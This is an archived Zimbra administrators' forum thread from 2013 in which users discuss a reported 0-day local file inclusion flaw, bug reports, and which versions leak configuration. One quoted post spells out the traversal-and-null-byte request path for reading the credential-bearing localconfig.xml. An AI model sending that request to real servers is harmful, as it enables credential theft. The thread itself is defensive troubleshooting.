zimbra 0-day

Discuss your pilot or production implementation with other Zimbra admins or our engineers.
phoenix
Ambassador
Ambassador
Posts: 26713
Joined: Fri Sep 12, 2014 9:56 pm
Location: Liverpool, England

zimbra 0-day

Postby phoenix » Tue Dec 10, 2013 4:38 am

Please see the following

I'll">http://www.zimbra.com/forums/known-issues/67237-security-guidance-reported-0day-exploit.html#post322495
I'll
say this again, if anyone thinks that the current version of Zimbra is still vulnerable to this problem please file a bug report[/URL] - that would be the correct place for this and get the attention of the Developers quicker that posting ad-hoc comments in the forums.


Regards

Bill

Rspamd: A high performance spamassassin replacement

Per ardua ad astra
expert_az
Posts: 29
Joined: Fri Sep 12, 2014 11:13 pm

zimbra 0-day

Postby expert_az » Tue Dec 10, 2013 5:32 am

phoenix I tried use zimbra bugzilla,it's not working for me.I could not enter bugzilla with old account(password resetted),then created new one and no sense.
between 0day exploit reported:Bug#: 85249
phoenix
Ambassador
Ambassador
Posts: 26713
Joined: Fri Sep 12, 2014 9:56 pm
Location: Liverpool, England

zimbra 0-day

Postby phoenix » Tue Dec 10, 2013 6:42 am

[quote user="expert_az"]phoenix I tried use zimbra bugzilla,it's not working for me.I could not enter bugzilla with old account(password resetted),then created new one and no sense.[/QUOTE]It works fine for me, make sure you don't have anything blocking it in your browser (or clear the cache).
Regards

Bill

Rspamd: A high performance spamassassin replacement

Per ardua ad astra
anndro
Posts: 2
Joined: Sat Sep 13, 2014 3:27 am

zimbra 0-day

Postby anndro » Tue Dec 10, 2013 6:46 am

I reported Bug#: 85249 but still UNCONFIRMED
nrc
Posts: 27
Joined: Fri Sep 12, 2014 10:29 pm

zimbra 0-day

Postby nrc » Tue Dec 10, 2013 8:09 am

[quote user="expert_az"]I can confirm ,LFI working on last 8.0.5 and after 7.2.2
LFI is located at :

/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
Zimbra - 0day exploit / Privilegie escalation via LFI[/QUOTE]
When I hit the URL used for the exploit on an 8.0.3 system it does not include the localconfig.xml file, which is where they're getting the credentials for the exploit. Have you checked the response to that URL on 8.0.3 and found information in it that would allow an exploit or are you just assuming that any response means a vulnerability?
It would be helpful at this point if Zimbra would open bug #80338 for review so that the community can understand the solution that was applied and assess whether what they're seeing now is expected behavior.
Also, I note that the prescribed exploit for this bug expects access to the admin console port (7071). Eliminating that doesn't solve the underlying LFI problem but in general I think it's a bad idea to have your admin console publicly accessible on the Internet.
liverpoolfcfan
Outstanding Member
Outstanding Member
Posts: 948
Joined: Sat Sep 13, 2014 12:47 am

zimbra 0-day

Postby liverpoolfcfan » Tue Dec 10, 2013 8:32 am

[quote user="nrc"]When I hit the URL used for the exploit on an 8.0.3 system it does not include the localconfig.xml file, which is where they're getting the credentials for the exploit. Have you checked the response to that URL on 8.0.3 and found information in it that would allow an exploit or are you just assuming that any response means a vulnerability? [/QUOTE]
I can confirm that on 7.2.5 the url returns lots of settings but NOT anything from the localconfig.xml file.
expert_az
Posts: 29
Joined: Fri Sep 12, 2014 11:13 pm

zimbra 0-day

Postby expert_az » Wed Dec 11, 2013 1:47 am

[quote user="nrc"]When I hit the URL used for the exploit on an 8.0.3 system it does not include the localconfig.xml file, which is where they're getting the credentials for the exploit. Have you checked the response to that URL on 8.0.3 and found information in it that would allow an exploit or are you just assuming that any response means a vulnerability?
It would be helpful at this point if Zimbra would open bug #80338 for review so that the community can understand the solution that was applied and assess whether what they're seeing now is expected behavior.
Also, I note that the prescribed exploit for this bug expects access to the admin console port (7071). Eliminating that doesn't solve the underlying LFI problem but in general I think it's a bad idea to have your admin console publicly accessible on the Internet.[/QUOTE]
nrc you are right, data comming back after hitting URL used by exploit is not localconfig.xml.But I'm getting long list of settings even on 8.0.5 ,is this normal?
nrc
Posts: 27
Joined: Fri Sep 12, 2014 10:29 pm

zimbra 0-day

Postby nrc » Thu Dec 12, 2013 7:19 pm

[quote user="3636JakeMS"]Hey guys.
From a quick bit of testing the admin one is fixed.
However hitting your ZCS 8.0.5 server with:


Doesn't">https://mail.yourdomain.com/opt/zimbra/conf/localconfig.xml
Doesn't
appear to pull localconfig.xml however is instead pulling a language file of some sort?[/QUOTE]
When I hit the URL you posted on my 8.0.3 system I get a 404 error, which is what I would expect. I really don't understand why anything in that namespace would respond.
The original URL used in the exploit appears to be hitting an API call that is intended to return configuration settings. I can't find the documentation for that specific call but as long as it's only returning the intended information and not arbitrary files through an LFI then it should be harmless.
nrc
Posts: 27
Joined: Fri Sep 12, 2014 10:29 pm

zimbra 0-day

Postby nrc » Fri Dec 13, 2013 8:57 pm

[quote user="3636JakeMS"]I've just checked my previous post.
It would seem vBulletin scrapped most of the URL.

[/QUOTE]
Ah! That makes more sense. Yes, I believe what you're seeing now is the expected response from an API request. I still see the same thing with version 8.0.6.
sugiggs
Advanced member
Advanced member
Posts: 92
Joined: Sat Sep 13, 2014 12:42 am

zimbra 0-day

Postby sugiggs » Mon Dec 30, 2013 1:42 am

Other than the obvious "upgrade to the latest version", any other way to "patch" this?
I have one installation still using version 6

Return to “Administrators”

Who is online

Users browsing this forum: No registered users and 13 guests